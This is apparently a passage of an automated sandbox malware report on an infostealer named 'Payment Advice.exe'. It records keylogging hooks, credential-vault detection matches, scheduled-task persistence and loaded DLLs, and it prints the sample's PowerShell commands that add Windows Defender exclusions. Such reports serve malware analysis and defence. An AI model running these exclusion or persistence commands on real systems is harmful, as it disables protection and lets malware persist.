                    Source: Payment Advice.exe, 00000008.00000002.4124616083.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4124167230.0000000002891000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: Payment Advice.exe, 00000008.00000002.4124616083.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4124167230.0000000002891000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: Payment Advice.exe, BjTxJte.exe.8.dr, sFPEKzHsLkYZIz.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                    Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49742
                    Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49750
                    Source: unknown, Network traffic detected: HTTP traffic on port 49742 -> 443
                    Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknown, Network traffic detected: HTTP traffic on port 49750 -> 443
                    Source: unknown, Network traffic detected: HTTP traffic on port 49735 -> 443
                    Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49735
                    Source: unknown, Network traffic detected: HTTP traffic on port 49739 -> 443
                    Source: unknown, HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49735 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49739 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49742 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49750 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: 0.2.Payment Advice.exe.4c497e8.1.raw.unpack, cPKWk.cs, .Net Code: _9Y8jnYI
                    Source: 0.2.Payment Advice.exe.4c84a08.2.raw.unpack, cPKWk.cs, .Net Code: _9Y8jnYI
                    Source: C:\Users\user\Desktop\Payment Advice.exe, Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Payment Advice.exe
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe, Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                    Source: C:\Users\user\Desktop\Payment Advice.exe, Window created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe, Window created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Window created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Window created: window name: CLIPBRDWNDCLASS

                    System Summary

                    Source: 0.2.Payment Advice.exe.4c84a08.2.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                    Source: 9.2.sFPEKzHsLkYZIz.exe.4e65888.4.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                    Source: 9.2.sFPEKzHsLkYZIz.exe.4e2a668.3.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                    Source: 20.2.BjTxJte.exe.3ce4260.1.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                    Source: 0.2.Payment Advice.exe.4c497e8.1.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                    Source: 14.2.BjTxJte.exe.41c5ac8.2.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                    Source: 0.2.Payment Advice.exe.4c84a08.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                    Source: 20.2.BjTxJte.exe.3d1f480.2.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                    Source: 20.2.BjTxJte.exe.3d1f480.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                    Source: 9.2.sFPEKzHsLkYZIz.exe.4e65888.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                    Source: 0.2.Payment Advice.exe.4c497e8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                    Source: 14.2.BjTxJte.exe.41c5ac8.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                    Source: 20.2.BjTxJte.exe.3ce4260.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                    Source: 9.2.sFPEKzHsLkYZIz.exe.4e2a668.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
                    Source: 0.2.Payment Advice.exe.8ec0000.8.raw.unpack, SQL.cs, Large array initialization: array initializer size 33608
                    Source: initial sample, Static PE information: Filename: Payment Advice.exe
                    Source: Payment Advice.exe, Static PE information: invalid certificate
                    Source: Payment Advice.exe, 00000000.00000002.1706697674.000000000129E000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs Payment Advice.exe
                    Source: Payment Advice.exe, 00000000.00000002.1710843743.00000000031E4000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilename935d4343-3e00-439b-b10a-ff974a5f8529.exe4 vs Payment Advice.exe
                    Source: Payment Advice.exe, 00000000.00000000.1645353775.0000000000AB8000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenameLtIh.exe< vs Payment Advice.exe
                    Source: Payment Advice.exe, 00000000.00000002.1720871520.000000000B470000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs Payment Advice.exe
                    Source: Payment Advice.exe, 00000000.00000002.1720188330.0000000008EC0000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs Payment Advice.exe
                    Source: Payment Advice.exe, 00000000.00000002.1710843743.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs Payment Advice.exe
                    Source: Payment Advice.exe, 00000000.00000002.1712393138.00000000048E6000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameTyrone.dll8 vs Payment Advice.exe
                    Source: Payment Advice.exe, 00000000.00000002.1712393138.0000000004C49000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilename935d4343-3e00-439b-b10a-ff974a5f8529.exe4 vs Payment Advice.exe
                    Source: Payment Advice.exe, 00000008.00000002.4116527914.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Payment Advice.exe
                    Source: Payment Advice.exe, Binary or memory string: OriginalFilenameLtIh.exe< vs Payment Advice.exe
                    Source: Payment Advice.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.Payment Advice.exe.4c84a08.2.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.sFPEKzHsLkYZIz.exe.4e65888.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.sFPEKzHsLkYZIz.exe.4e2a668.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 20.2.BjTxJte.exe.3ce4260.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payment Advice.exe.4c497e8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 14.2.BjTxJte.exe.41c5ac8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payment Advice.exe.4c84a08.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 20.2.BjTxJte.exe.3d1f480.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 20.2.BjTxJte.exe.3d1f480.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.sFPEKzHsLkYZIz.exe.4e65888.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payment Advice.exe.4c497e8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 14.2.BjTxJte.exe.41c5ac8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 20.2.BjTxJte.exe.3ce4260.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.sFPEKzHsLkYZIz.exe.4e2a668.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: Payment Advice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: sFPEKzHsLkYZIz.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.Payment Advice.exe.4c497e8.1.raw.unpack, cPs8D.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payment Advice.exe.4c497e8.1.raw.unpack, 72CF8egH.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payment Advice.exe.4c497e8.1.raw.unpack, G5CXsdn.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payment Advice.exe.4c497e8.1.raw.unpack, 3uPsILA6U.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Payment Advice.exe.4c497e8.1.raw.unpack, 6oQOw74dfIt.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payment Advice.exe.4c497e8.1.raw.unpack, aMIWm.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 0.2.Payment Advice.exe.4c497e8.1.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, k8kSUDwarKJEU7Xa30.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, g45rfxMhkEpawBNuWE.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, g45rfxMhkEpawBNuWE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, g45rfxMhkEpawBNuWE.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, k8kSUDwarKJEU7Xa30.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, g45rfxMhkEpawBNuWE.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, g45rfxMhkEpawBNuWE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, g45rfxMhkEpawBNuWE.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@33/20@2/2
                    Source: C:\Users\user\Desktop\Payment Advice.exeFile created: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8144:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMutant created: \Sessions\1\BaseNamedObjects\ulmOXmclEpqFJLBfFWotANyak
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7292:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6816:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7216:120:WilError_03
                    Source: C:\Users\user\Desktop\Payment Advice.exeFile created: C:\Users\user\AppData\Local\Temp\tmp6619.tmp
                    Source: Payment Advice.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payment Advice.exeFile read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\Payment Advice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: Payment Advice.exeReversingLabs: Detection: 39%
                    Source: C:\Users\user\Desktop\Payment Advice.exeFile read: C:\Users\user\Desktop\Payment Advice.exe:Zone.Identifier
                    Source: unknownProcess created: C:\Users\user\Desktop\Payment Advice.exe "C:\Users\user\Desktop\Payment Advice.exe"
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp6619.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Users\user\Desktop\Payment Advice.exe "C:\Users\user\Desktop\Payment Advice.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp7ACA.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeProcess created: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe "C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmpA082.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmpC03F.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeProcess created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: version.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: msvcp140_clr0400.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: wldp.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: profapi.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: amsi.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: userenv.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: textshaping.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: netutils.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: propsys.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: edputil.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: slc.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: sppc.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
